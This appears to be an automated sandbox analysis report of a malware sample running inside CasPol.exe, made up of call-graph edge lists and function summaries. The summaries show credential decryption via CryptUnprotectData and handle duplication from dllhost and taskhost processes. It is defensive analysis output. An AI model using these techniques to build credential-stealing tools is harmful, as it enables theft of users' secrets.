memcpy memset memcpy memcpy memcpy 40005->40177 40006 43b544 40010 43b55c 40006->40010 40183 42c02e memset 40006->40183 40007 43b428 40007->40000 40175 432b60 16 API calls 40007->40175 40008 43afca 40138 423330 11 API calls 40008->40138 40178 4233ae 11 API calls 40009->40178 40184 43a87a 163 API calls 40010->40184 40016 43afdb 40139 4233ae 11 API calls 40016->40139 40018 43b56c 40021 43b58a 40018->40021 40185 423330 11 API calls 40018->40185 40019 43b4b1 40179 423399 11 API calls 40019->40179 40020 43afee 40140 44081d 163 API calls 40020->40140 40186 440f84 12 API calls 40021->40186 40026 43b4c1 40188 42db80 163 API calls 40026->40188 40028 43b592 40187 43a82f 16 API calls 40028->40187 40031 43b5b4 40189 438c4e 163 API calls 40031->40189 40033 43b5cf 40190 42c02e memset 40033->40190 40035 43b1ef 40151 4233c5 16 API calls 40035->40151 40036 43b005 40036->39930 40039 43b01f 40036->40039 40141 42d836 163 API calls 40036->40141 40039->40035 40149 423330 11 API calls 40039->40149 40150 42d71d 163 API calls 40039->40150 40040 43b212 40152 423330 11 API calls 40040->40152 40041 43b087 40142 4233ae 11 API calls 40041->40142 40043 43add4 40043->39985 40191 438f86 16 API calls 40043->40191 40047 43b22a 40153 42ccb5 11 API calls 40047->40153 40049 43b10f 40145 423330 11 API calls 40049->40145 40050 43b23f 40154 4233ae 11 API calls 40050->40154 40052 43b257 40155 4233ae 11 API calls 40052->40155 40056 43b129 40146 4233ae 11 API calls 40056->40146 40057 43b26e 40156 4233ae 11 API calls 40057->40156 40060 43b09a 40060->40049 40143 42cc15 19 API calls 40060->40143 40144 4233ae 11 API calls 40060->40144 40061 43b282 40157 43a87a 163 API calls 40061->40157 40063 43b13c 40147 440f84 12 API calls 40063->40147 40065 43b29d 40158 423330 11 API calls 40065->40158 40068 43b15f 40148 4233ae 11 API calls 40068->40148 40069 43b2af 40071 43b2b8 40069->40071 40072 43b2ce 40069->40072 40159 4233ae 11 API calls 40071->40159 40160 440f84 12 API calls 40072->40160 40075 43b2da 40161 42370b memset memcpy memset 40075->40161 40076 43b2c9 40162 4233ae 11 API calls 40076->40162 40079 43b2f9 40163 423330 11 API calls 40079->40163 40081 43b30b 40164 423330 11 API calls 40081->40164 40083 43b325 40165 423399 11 API calls 40083->40165 40085 43b332 40166 4233ae 11 API calls 40085->40166 40087 43b354 40167 423399 11 API calls 40087->40167 40089 43b364 40168 43a82f 16 API calls 40089->40168 40091 43b370 40169 42db80 163 API calls 40091->40169 40093 43b380 40170 438c4e 163 API calls 40093->40170 40095 43b39e 40171 423399 11 API calls 40095->40171 40097 43b3ae 40172 43a76c 21 API calls 40097->40172 40099 43b3c3 40173 423399 11 API calls 40099->40173 40101->39922 40102->39924 40103->39927 40105 43a6f5 40104->40105 40106 43a765 40104->40106 40105->40106 40193 42a115 40105->40193 40106->39930 40113 4397fd memset 40106->40113 40110 43a73d 40110->40106 40111 42a115 147 API calls 40110->40111 40111->40106 40112->39932 40113->39939 40114->39930 40115->39954 40116->39943 40117->39948 40118->39944 40119->39947 40120->39952 40121->39956 40122->39958 40123->39962 40124->39970 40125->39967 40126->39971 40127->40043 40128->39964 40129->39972 40130->39976 40131->39977 40132->39977 40133->39986 40134->39990 40135->39994 40136->40001 40137->40008 40138->40016 40139->40020 40140->40036 40141->40041 40142->40060 40143->40060 40144->40060 40145->40056 40146->40063 40147->40068 40148->40039 40149->40039 40150->40039 40151->40040 40152->40047 40153->40050 40154->40052 40155->40057 40156->40061 40157->40065 40158->40069 40159->40076 40160->40075 40161->40076 40162->40079 40163->40081 40164->40083 40165->40085 40166->40087 40167->40089 40168->40091 40169->40093 40170->40095 40171->40097 40172->40099 40173->40043 40174->40007 40175->40000 40176->40005 40177->40009 40178->40019 40179->40026 40180->39998 40181->39999 40182->40006 40183->40010 40184->40018 40185->40021 40186->40028 40187->40026 40188->40031 40189->40033 40190->40043 40191->39985 40192->39930 40194 42a175 40193->40194 40196 42a122 40193->40196 40194->40106 40199 42b13b 147 API calls 40194->40199 40196->40194 40197 42a115 147 API calls 40196->40197 40200 43a174 40196->40200 40224 42a0a8 147 API calls 40196->40224 40197->40196 40199->40110 40214 43a196 40200->40214 40215 43a19e 40200->40215 40201 43a306 40201->40214 40240 4388c4 14 API calls 40201->40240 40204 42a115 147 API calls 40204->40215 40205 415a91 memset 40205->40215 40206 43a642 40206->40214 40244 4169a7 11 API calls 40206->40244 40210 43a635 40243 42c02e memset 40210->40243 40214->40196 40215->40201 40215->40204 40215->40205 40215->40214 40225 42ff8c 40215->40225 40233 4165ff 40215->40233 40236 439504 13 API calls 40215->40236 40237 4312d0 147 API calls 40215->40237 40238 42be4c memcpy memcpy memcpy memset memcpy 40215->40238 40239 43a121 11 API calls 40215->40239 40217 43a325 40217->40206 40217->40210 40217->40214 40218 4169a7 11 API calls 40217->40218 40219 42b5b5 memset memcpy 40217->40219 40220 42bf4c 14 API calls 40217->40220 40223 4165ff 11 API calls 40217->40223 40241 42b63e 14 API calls 40217->40241 40242 42bfcf memcpy 40217->40242 40218->40217 40219->40217 40220->40217 40223->40217 40224->40196 40245 43817e 40225->40245 40227 42ff99 40228 42ffe3 40227->40228 40229 42ffd0 40227->40229 40232 42ff9d 40227->40232 40250 4169a7 11 API calls 40228->40250 40249 4169a7 11 API calls 40229->40249 40232->40215 40234 4165a0 11 API calls 40233->40234 40235 41660d 40234->40235 40235->40215 40236->40215 40237->40215 40238->40215 40239->40215 40240->40217 40241->40217 40242->40217 40243->40206 40244->40214 40246 438187 40245->40246 40248 438192 40245->40248 40251 4380f6 40246->40251 40248->40227 40249->40232 40250->40232 40253 43811f 40251->40253 40252 438164 40252->40248 40253->40252 40256 437e5e 40253->40256 40279 4300e8 memset memset memcpy 40253->40279 40280 437d3c 40256->40280 40258 437eb3 40258->40253 40259 437ea9 40259->40258 40264 437f22 40259->40264 40295 41f432 40259->40295 40262 437f06 40342 415c56 11 API calls 40262->40342 40266 432d4e 3 API calls 40264->40266 40269 437f7f 40264->40269 40265 437f95 40343 415c56 11 API calls 40265->40343 40266->40269 40267 43802b 40270 4165ff 11 API calls 40267->40270 40269->40265 40269->40267 40271 438054 40270->40271 40306 437371 40271->40306 40274 43806b 40275 438094 40274->40275 40344 42f50e 138 API calls 40274->40344 40278 437fa3 40275->40278 40345 4300e8 memset memset memcpy 40275->40345 40278->40258 40346 41f638 104 API calls 40278->40346 40279->40253 40281 437d69 40280->40281 40284 437d80 40280->40284 40347 437ccb 11 API calls 40281->40347 40283 437d76 40283->40259 40284->40283 40285 437da3 40284->40285 40287 437d90 40284->40287 40288 438460 134 API calls 40285->40288 40287->40283 40351 437ccb 11 API calls 40287->40351 40291 437dcb 40288->40291 40289 437de8 40350 424f26 123 API calls 40289->40350 40291->40289 40348 444283 13 API calls 40291->40348 40293 437dfc 40349 437ccb 11 API calls 40293->40349 40296 41f54d 40295->40296 40302 41f44f 40295->40302 40297 41f466 40296->40297 40381 41c635 memset memset 40296->40381 40297->40262 40297->40264 40302->40297 40304 41f50b 40302->40304 40352 41f1a5 40302->40352 40377 41c06f memcmp 40302->40377 40378 41f3b1 90 API calls 40302->40378 40379 41f398 86 API calls 40302->40379 40304->40296 40304->40297 40380 41c295 86 API calls 40304->40380 40307 41703f 11 API calls 40306->40307 40308 437399 40307->40308 40309 43739d 40308->40309 40311 4373ac 40308->40311 40382 4446ea 11 API calls 40309->40382 40312 416935 16 API calls 40311->40312 40313 4373ca 40312->40313 40314 438460 134 API calls 40313->40314 40319 4251c4 137 API calls 40313->40319 40323 415a91 memset 40313->40323 40326 43758f 40313->40326 40338 437584 40313->40338 40341 437d3c 135 API calls 40313->40341 40383 425433 13 API calls 40313->40383 40384 425413 17 API calls 40313->40384 40385 42533e 16 API calls 40313->40385 40386 42538f 16 API calls 40313->40386 40387 42453e 123 API calls 40313->40387 40314->40313 40315 4375bc 40390 415c7d 16 API calls 40315->40390 40318 4375d2 40340 4373a7 40318->40340 40391 4442e6 11 API calls 40318->40391 40319->40313 40321 4375e2 40321->40340 40392 444283 13 API calls 40321->40392 40323->40313 40388 42453e 123 API calls 40326->40388 40329 4375f4 40332 437620 40329->40332 40333 43760b 40329->40333 40331 43759f 40334 416935 16 API calls 40331->40334 40336 416935 16 API calls 40332->40336 40393 444283 13 API calls 40333->40393 40334->40338 40336->40340 40338->40315 40389 42453e 123 API calls 40338->40389 40339 437612 memcpy 40339->40340 40340->40274 40341->40313 40342->40258 40343->40278 40344->40275 40345->40278 40346->40258 40347->40283 40348->40293 40349->40289 40350->40283 40351->40283 40353 41bc3b 101 API calls 40352->40353 40354 41f1b4 40353->40354 40355 41edad 86 API calls 40354->40355 40362 41f282 40354->40362 40356 41f1cb 40355->40356 40357 41f1f5 memcmp 40356->40357 40358 41f20e 40356->40358 40356->40362 40357->40358 40359 41f21b memcmp 40358->40359 40358->40362 40360 41f326 40359->40360 40363 41f23d 40359->40363 40361 41ee6b 86 API calls 40360->40361 40360->40362 40361->40362 40362->40302 40363->40360 40364 41f28e memcmp 40363->40364 40366 41c8df 56 API calls 40363->40366 40364->40360 40365 41f2a9 40364->40365 40365->40360 40368 41f308 40365->40368 40369 41f2d8 40365->40369 40367 41f269 40366->40367 40367->40360 40370 41f287 40367->40370 40371 41f27a 40367->40371 40368->40360 40375 4446ce 11 API calls 40368->40375 40372 41ee6b 86 API calls 40369->40372 40370->40364 40373 41ee6b 86 API calls 40371->40373 40374 41f2e0 40372->40374 40373->40362 40376 41b1ca memset 40374->40376 40375->40360 40376->40362 40377->40302 40378->40302 40379->40302 40380->40296 40381->40297 40382->40340 40383->40313 40384->40313 40385->40313 40386->40313 40387->40313 40388->40331 40389->40315 40390->40318 40391->40321 40392->40329 40393->40339 40394 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37695 4260a1 37691->37695 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37695->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37699 429a7a 37739 416760 11 API calls 37699->37739 37705->37686 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37699 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37763 41ee3c 37763->37744 37765 41ee58 37765->37763 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37763 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37763 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37784 41be8c 37778->37784 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37781 41be69 37781->37763 37781->37772 37783 41bee7 37783->37781 37816 41a453 86 API calls 37783->37816 37784->37781 37784->37783 37785 41bf3a 37784->37785 37787 41bed1 37784->37787 37815 4446ce 11 API calls 37785->37815 37789 41bef0 37787->37789 37791 41bee2 37787->37791 37789->37783 37790 41bf01 37789->37790 37792 41bf24 memset 37790->37792 37794 41bf14 37790->37794 37813 418a6d memset memcpy memset 37790->37813 37802 41ac13 37791->37802 37792->37781 37814 41a223 memset memcpy memset 37794->37814 37797 41bf20 37797->37792 37801 418c72 37798->37801 37799 418c94 37799->37784 37800 418d51 memset memset 37800->37799 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37808 41aca1 37807->37808 37818 41519d 37807->37818 37808->37805 37810 41acc0 memset 37808->37810 37811 41accd memcpy 37808->37811 37810->37805 37811->37805 37812->37781 37813->37794 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37808 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 CloseHandle 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39895 4147f3 39898 414561 39895->39898 39897 414813 39899 41456d 39898->39899 39900 41457f GetPrivateProfileIntW 39898->39900 39903 4143f1 memset _itow WritePrivateProfileStringW 39899->39903 39900->39897 39902 41457a 39902->39897 39903->39902

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                          • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1355100292-0
                                                                                                                                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 767404330-0
                                                                                                                                                                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-445580 call 4136c0 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 63 445585-44558c call 41366b 45->63 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 63->44 